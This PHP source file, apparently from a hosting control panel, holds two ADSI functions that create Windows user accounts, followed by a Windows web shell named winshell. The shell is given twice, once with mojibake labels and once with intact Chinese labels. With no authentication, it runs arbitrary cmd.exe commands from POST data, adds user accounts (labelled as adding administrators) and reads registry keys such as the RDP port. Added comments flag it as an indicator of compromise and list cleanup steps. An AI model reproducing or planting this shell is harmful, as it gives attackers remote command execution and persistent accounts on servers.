/**
 * Ensure a local Windows account named $basename exists and set its password.
 *
 * Binds to the local machine container through ADSI ("WinNT://.") and tries to
 * open the account; when that bind throws (no such account) the account is
 * created in the container. In both cases the password is then set and the
 * change committed with setInfo().
 *
 * @param string $basename  account name; interpolated unescaped into the ADSI
 *                          path, so it is assumed to already be a validated plain
 *                          user name — confirm at the call site
 * @param string $password  password applied on every call, new or existing account
 * @param mixed  $id        accepted for signature compatibility; unused here
 * @param mixed  $shell     accepted for signature compatibility; unused here
 * @param string $dir       accepted for signature compatibility; unused here
 */
function os_create_system_user($basename, $password, $id, $shell, $dir = "/tmp")
{
    $container = new COM("WinNT://.");
    $account = null;
    try {
        // An existing account binds directly; a missing one raises an exception.
        $account = new COM("WinNT://./{$basename}");
    } catch (exception $e) {
        $account = $container->create("user", $basename);
    }
    $account->setPassword($password);
    $account->setInfo();
}
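/**
 * Create the local Windows account for this uuser object via ADSI.
 *
 * If an account with the same name already exists it is accepted only when its
 * Description equals uuser::getUserDescription() for the parent; then nothing is
 * changed (the password is NOT reset) and true is returned. An existing account
 * with any other description is a name clash and throws 'user_exists'. Otherwise
 * the account is created with its home directory under
 * c:/webroot/<parent>/<parent>, added to the local "Users" group, given the
 * password from $this->main->realpass and the uuser description.
 *
 * The existence check used to sit inside the try block whose catch creates the
 * account, so the 'user_exists' exception raised on a description mismatch was
 * (assuming lxexception extends Exception) swallowed by that catch and the code
 * went on to create the account anyway. The check now runs after the bind
 * attempt, so the exception propagates as intended. The unused globals and the
 * unused $passwd local were dropped.
 *
 * @return bool true when an account with the expected description already existed
 * @throws lxexception 'user_exists' on a name clash or when the new account cannot be committed
 */
function createUser()
{
    $mn = $this->main;
    $nname = $mn->nname;
    $parentname = $mn->getParentName();
    $description = uuser::getUserDescription($parentname);

    print "creatinguser\n";

    $container = new COM("WinNT://.");

    // Bind to an existing account; ADSI throws when there is none.
    $existing = null;
    try {
        $existing = new COM("WinNT://./{$nname}");
    } catch (exception $e) {
        $existing = null;
    }

    if ($existing !== null) {
        dprint("description\n");
        dprint($existing->Description);
        dprint("\n");
        // Only an account carrying our own description marker is treated as ours.
        if ($existing->Description === $description) {
            return true;
        }
        throw new lxexception("user_exists", 'web_s_uuser_nname', $nname);
    }

    $user = $container->create("user", $nname);
    $user->HomeDirectory = convertTobackSlash("c:/webroot/{$parentname}/{$parentname}");
    try {
        // First commit creates the account; failure here means the name is taken.
        $user->setInfo();
    } catch (exception $e) {
        log_error("User Couldn't be created");
        throw new lxexception("user_exists", 'web_s_uuser_nname', $nname);
    }

    $grp = new COM("WinNT://./Users");
    $grp->Add("WinNT://{$nname}");
    $user->setPassword($mn->realpass);
    $user->Description = $description;
    $user->setInfo();
}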
/**
 * Web-shell style remote-administration endpoint, not application logic.
 *
 * Every action is chosen by request parameters and carried out through Windows
 * COM objects; no authentication, CSRF or input validation is visible in this
 * function (a caller may gate it — not determinable from here):
 *   - $_GET['winshell'] == 'wscript'  : builds "<wcpth> /c <wcmd>" from $_POST
 *     values and runs it through Wscript.Shell->exec(), echoing the output;
 *   - 'shelluser'                     : creates a local account via Shell.Users
 *     with name/password from $_POST and sets AccountType 3;
 *   - 'regedit'                       : reads the registry value named by
 *     $_POST['regpath'] through WScript.Shell->RegRead();
 *   - anything else                   : prints the menu linking the three modes.
 *
 * Defensive reading: finding this in a deployed PHP tree should be treated as an
 * indicator of compromise. Preserve the file for forensics, then remove it;
 * search web-server access logs for requests carrying `s=jk&winshell=`; audit
 * local accounts created around that time; and look for Wscript.Shell /
 * Shell.Users COM instantiation in other PHP sources, which is rare in
 * legitimate applications. The UI labels here are Chinese text mis-decoded into
 * replacement characters (mojibake); the same function appears again later in
 * this file with intact UTF-8 labels.
 */
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users�������ӹ���Ա<br><br> {$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? 
$_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()������ȡע��������(Shell.Wscript����)<br><br> ע����·����<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="��ȡ����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '����: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Wscript������<br> WscriptΪ����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.user����<br> USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br> RegRead()������ȡϵͳע��������<br>{$tip}</pre></div> END; } }
/**
 * Web-shell style remote-administration endpoint, not application logic.
 *
 * Every action is chosen by request parameters and carried out through Windows
 * COM objects; no authentication, CSRF or input validation is visible in this
 * function (a caller may gate it — not determinable from here):
 *   - $_GET['winshell'] == 'wscript'  : builds "<wcpth> /c <wcmd>" from $_POST
 *     values and runs it through Wscript.Shell->exec(), echoing the output;
 *   - 'shelluser'                     : creates a local account via Shell.Users
 *     with name/password from $_POST and sets AccountType 3;
 *   - 'regedit'                       : reads the registry value named by
 *     $_POST['regpath'] through WScript.Shell->RegRead();
 *   - anything else                   : prints the menu linking the three modes.
 *
 * Defensive reading: finding this in a deployed PHP tree should be treated as an
 * indicator of compromise. Preserve the file for forensics, then remove it;
 * search web-server access logs for requests carrying `s=jk&winshell=`; audit
 * local accounts created around that time; and look for Wscript.Shell /
 * Shell.Users COM instantiation in other PHP sources, which is rare in
 * legitimate applications. This is a duplicate of the same function earlier in
 * this file; here the Chinese UI labels are intact UTF-8, there they are
 * mis-decoded.
 */
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users组件添加管理员<br><br> {$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="添加" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? 
$_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br> 注册表路径:<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="读取内容" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '内容: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Wscript组件。<br> Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.user组件<br> USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br> RegRead()函数读取系统注册表内容<br>{$tip}</pre></div> END; } }